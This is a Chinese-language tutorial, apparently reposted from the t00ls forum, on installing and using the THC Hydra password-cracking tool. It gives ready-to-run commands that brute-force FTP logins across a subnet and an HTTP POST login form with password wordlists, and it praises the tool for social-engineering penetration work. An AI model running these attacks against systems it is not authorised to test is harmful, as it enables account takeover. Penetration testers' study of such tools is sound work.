本文转自t00ls 下载链接:http://www.thc.org/download.php?t=r&f=hydra-7.0-src.tar.gz 一、介绍(简译自官方) hydra著名黑客组织thc的一款开源的暴力破解工具,可以破解多种密码。 其官网http://www.thc.org,可支持 TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,ICQ, SAP/R3……等密码破解。 二、安装 su root tar zxvf hydra-7.0-src.tar.gz cd hydra-7.0-src ./configure make make install 另外,该软件支持GUI 三、参数 hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度破解 -S 采用SSL链接 -s PORT 可通过这个参数指定非默认端口 -l LOGIN 指定破解的用户 -L FILE 指定用户名字典 -p PASS 指定密码破解 -P FILE 指定密码字典 -e ns 可选选项,n:空密码试探,s:使用指定账户和密码试探 -C FILE 使用冒号分割格式 例如 “登录名:密码”来代替-L/-P参数 -M FILE 指定目标列表文件一行一条 -o FILE 指定结果输出文件 -f 在使用-M参数以后 找到第一对登录名或者密码的时候中止破解 -t TASKS 同时运行的线程数,默认为16 -w TIME 设置最大超时的时间,单位秒,默认是30s -v / -V 显示详细过程 server 目标ip service 指定服务名,支持: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form 等等 OPT 可选项 四、实例 1.ftp password crack hydra -L /tmp/ftpuser.lst -P /tmp/ftppwd.lst 10.10.1* ftp hydra -l admin -P /tmp/ftppwd.lst -v 10.10.1.6 ftp 破解成功,直接显示结果,也可以通过参数-o让他输出到文件 2.Guessing password attack 登录表单(无验证码): `
<div id="highlighter_396653">
<div>
<div>[预览源代码](#viewSource "预览源代码")[打印](#printSource "打印")[关于](#about "关于")
</div>
</div>
<div>
<div>
<table>
<tbody>
<tr>
<td> 1</td>
<td> <form` `action ="login.php"` `method ="POST" > </td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td> 2</td>
<td> <input` `type ="text"` `name ="id"` `/> `</td>
</tr>
</tbody>
</table>
</div>
<div>
<table>
<tbody>
<tr>
<td>`3`</td>
<td>`< input`type``=``"password" name``=``"passwd" /> |
4 | <``input type``=``"submit" name``=``"OK" value``=``"submit"``> |
5 | </``form``> |
执行命令:
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.10.1.6 http-post-form “login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>”
(参数说明:-t 同时线程数3,-l 用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.10.1.6目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。PS:注意彩色标记部分与表单对应。)
五、小结
此工具强大之处远多于以上测试,其密码能否破解关键在于强大的字典,对于社工型渗透来说,有时能够得到事半功倍的效果。更多小记期待大家共享。